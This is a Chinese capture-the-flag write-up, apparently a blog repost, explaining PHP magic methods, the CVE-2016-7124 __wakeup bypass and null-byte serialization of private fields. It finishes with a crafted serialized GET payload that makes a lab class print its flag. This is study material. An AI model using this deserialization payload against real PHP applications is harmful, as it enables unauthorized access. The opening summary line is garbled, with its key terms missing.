摘要:将中表示数量的字段改成比实际字段大的值即可绕过函数。条件,,或者当对象被创建即之前,会触发进行初始化,但在时是不会自动调用的。因此保护类的变量在序列化时,前面会加上的前缀。这里的表示码为的字符不可见字符,而不是组合。无标记,变量名不变。
目录
1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4
2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unserialize()时是不会自动调用的。
3. __destruct() //在到某个对象的所有引用都被删除或者当对象被显式销毁时执行或者当所有的操作正常执行完毕之后,需要释放序列化的对象即在脚本结束时(非unset)php才会销毁引用 一般来说在脚本正常结束运行之前运行。如果抛出异常就不会调用。protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见,也就不能输出。因此保护类的变量在序列化时,前面会加上/0*/0的前缀。这里的 /0 表示 ASCII 码为 0 的字符(不可见字符),而不是 /0 组合。计算长度时/0(%00)算做一个字符。url中用%00代替。
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见,也就不能输出。因此私有类的变量在序列化时,前面都会加上/0类名/0的前缀。计算长度时/0(%00)算做一个字符。url中用%00代替。
public无标记,变量名不变。 s:2:"op";i:2;
protected在变量名前添加标记/00*/00。 s:5:"/00*/00op";i:2;
private在变量名前添加标记/00类名/00。s:17:"/00类名/00op";i:2;
PHP——serialize()序列化类变量public、protected、private的区别_东京没有下雨天-CSDN博客网站的文件放在:www.zip
页面没有什么特别的东西,查看源代码也没有发现什么。显示说有网站备份,猜是www.zip,或者直接用dirsearch或者御剑扫瞄
下载文件,解压打开。
flag.php
发现不是正确的flag。
index.php
显示包含了class.php文件,并且有一个反序列化点,那应该就是php反序列化的问题了。
class.php
username = $username; $this->password = $password; } function __wakeup(){ $this->username = "guest"; } function __destruct(){ if ($this->password != 100) { echo "NO!!!hacker!!!"; echo "You name is: "; echo $this->username;echo ""; echo "You password is: "; echo $this->password;echo ""; die(); } if ($this->username === "admin") { global $flag; echo $flag; }else{ echo "hello my friend~~sorry i can"t give you the flag!"; die(); } }}?>发现在__destruct()中有个输出$flag变量的代码。那么思路就是序列化修改username的值为admin,传参给select即可。但是我们发现调用__destruct()方法之前会调用__wakeup()方法,修改username的值为guest。那么重点就是绕过这个__wakeup()方法。绕过方法看前面的知识点。
因为当password!=100的时候,会进入if语句,die()结束程序,而无法输出flag,所以需要将password的值修改为100。
输出序列化字符串:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}这里我们发现Nameusername与前面的14不对应,少了两个字符,而Namepassword也是少了两个字符,这是因为username和password变量是private类型,变量中的类名前后会有空白符,而复制的时候会丢失,所以还需要加上%00,同时要绕过_wakeup(),还要将Name后面的数字修改为大于2的数。
结果:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}get传参:
?select=O:4:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/121335.html
摘要:这里使用双写绕过就好啦查表得到表名查列名查数据见我另一篇博客吖 Havefun F12 EasySQL 1' or 1=1# Secret File...
摘要:两次编码值为构造所以我们的就是成功拿到极客大挑战这种就是抓抓包了,发现有单引号报错那就是典型的万能密码了极客大挑战先看网页源代码吧试了试居然解出了。 [CTF从0到...
摘要:打开一看提示说有备份网站习惯,用工具扫一下发现了得到了网站备份。 打开一看提示说有备份网站习惯,用工具扫一下发现了www.zip得到了网站备份。 得到了3个php ...
摘要:漏洞触发的点往往是可以上传文件的位置,没有对上传的文件进行过滤,导致可上传恶意文件。无回显,又称为,可以使用外带数据通道提取数据。 [GWCTF 2019]我有一个...
摘要:文章目录利用点源码代码审计协议绕过死亡关于的说明构造链构造完利用点协议绕过死亡源码 文章目录 利用点源码代码审计class Bbase64 + filter协议绕...
阅读 1041·2023-04-25 23:22
阅读 1429·2023-04-25 20:04
阅读 2376·2021-11-22 15:24
阅读 2551·2021-11-11 16:54
阅读 2290·2021-09-28 09:35
阅读 1713·2019-08-30 14:03
阅读 1374·2019-08-29 16:35
阅读 1533·2019-08-26 10:29
